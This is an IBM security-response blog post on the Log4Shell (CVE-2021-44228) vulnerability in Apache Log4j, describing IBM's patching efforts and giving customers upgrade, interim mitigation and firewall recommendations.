An update on the Apache Log4j CVE-2021-44228 vulnerability – IBM PSIRT Blog

Dec 12, 2021 9:10 pm EST

Categorized: Critical Severity

Share this post:

IBM is actively responding to the reported remote code execution vulnerability in the Apache Log4j 2 Java library dubbed Log4Shell (or LogJam). We are investigating and taking action for IBM as an enterprise, IBM products and IBM services that may be potentially impacted, and will continually publish information to help customers detect, investigate and mitigate attacks, if any, to their IBM products and services.

 

IBM Enterprise
IBM is continuing to inventory our products and systems potentially impacted by the vulnerability. As necessary, we are updating to Log4j version 2.15, which fixes the vulnerability, and applying mitigations in the interim, even in cases where additional control layers such as network controls and web application firewalls have prevented exploitation of this vulnerability.

 

IBM Software and Systems Products
IBM is continuing a product-by-product analysis for Log4j impacts. If an IBM Software or Systems product is impacted, there will be a bulletin posted on this blog as a remediation or fix becomes available. Such on-premise IBM products will then have to be updated by the customer.

 

IBM Consulting 
IBM Consulting will continue to work directly with its clients in support of the remediation of custom applications and services through its normal delivery center and platform support processes.

 

IBM Security

The IBM X-Force team of hackers, responders, researchers, intelligence analysts and investigators are actively engaged in the response to Log4jShell. Detection and Indicators of Compromise (IOCs) for IBM Security tools are being published on the 

IBM X-Force Exchange

 

The IBM Managed Security Services (MSS) organization also is reviewing all systems to eliminate the vulnerability. The team is tracking patch releases for impacted platforms that IBM Security Services manages. Clients may see Security Advisory tickets and requests to patch managed devices in the MSS portal.

 

Assistance for customers suspecting potential compromise also is available 24/7 via IBM Security X-Force’s US hotline 

1-888-241-9812

 | Global hotline (+001) 

312-212-8034

.

 

IBM Cloud and as-a-Service Products
For IBM Cloud services, IBM is remediating managed as-a-service Cloud offerings as applicable, even in cases where additional control layers such as network controls and web application firewalls have prevented exploitation of this vulnerability.

 

Clients of IBM Cloud’s Classic and VPC Virtual Machine services are responsible for remediating any Log4j vulnerabilities in code running inside those Virtual Machines. IBM Cloud based virtual machine images and package repositories are being updated wherever they contain the vulnerable code.

 

For the portion of IBM Cloud services using Java technologies, IBM is continuing to assess and remediate any remaining services using Log4j and validate that mitigating controls remain effective.

 

IBM’s recommendations to its clients:

At this time, IBM recommends organizations running Apache Log4j take the following actions: 

Check for vulnerable versions of Apache Log4j in your environments and applications.Implement latest patch to production environments as soon as possible. Monitor IBM PSIRT for security bulletinsMonitor for vendor patches as they become available

Reference material can be found at the 

Apache.orgLog4j Security Vulnerability

page.

 

IBM X-Force also has provided an analysis of the Log4j vulnerability, which can be found on the

IBM Security Intelligence blog

.

 

Per the Apache Log4j security vulnerability advisory, the following temporary mitigations may provide interim protection for clients who are unable to upgrade Log4j in their workloads quickly: 

 

In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. 

 

Users of IBM’s Cloud Internet Services, powered by Cloudflare, may use the Web Application Firewall feature to mitigate attacks against their own workloads hosted in IBM Cloud, by detecting and blocking requests that attempt to exploit the vulnerability. More details are available at 

https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

 

IBM recommends that users of IBM Cloud’s firewall services, including Fortigate, Juniper vSRX, Security Groups, and Network ACLs, should configure their firewalls to block unauthorized outbound connections to mitigate against this and similar vulnerabilities. In addition, Fortigate has released IPS rules to detect and block this specific vulnerability (

https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability

), as has Juniper (

https://threatlabs.juniper.net/home/search/#/details/?sigtype=ips&sigid=HTTP:APACHE:LOG4J-JNDI-MGNR-RCE

). If you are using a next generation firewall appliance from another supplier, IBM recommends contacting the firewall vendor for specific guidance for mitigating the Log4j vulnerability.

Verified by MonsterInsights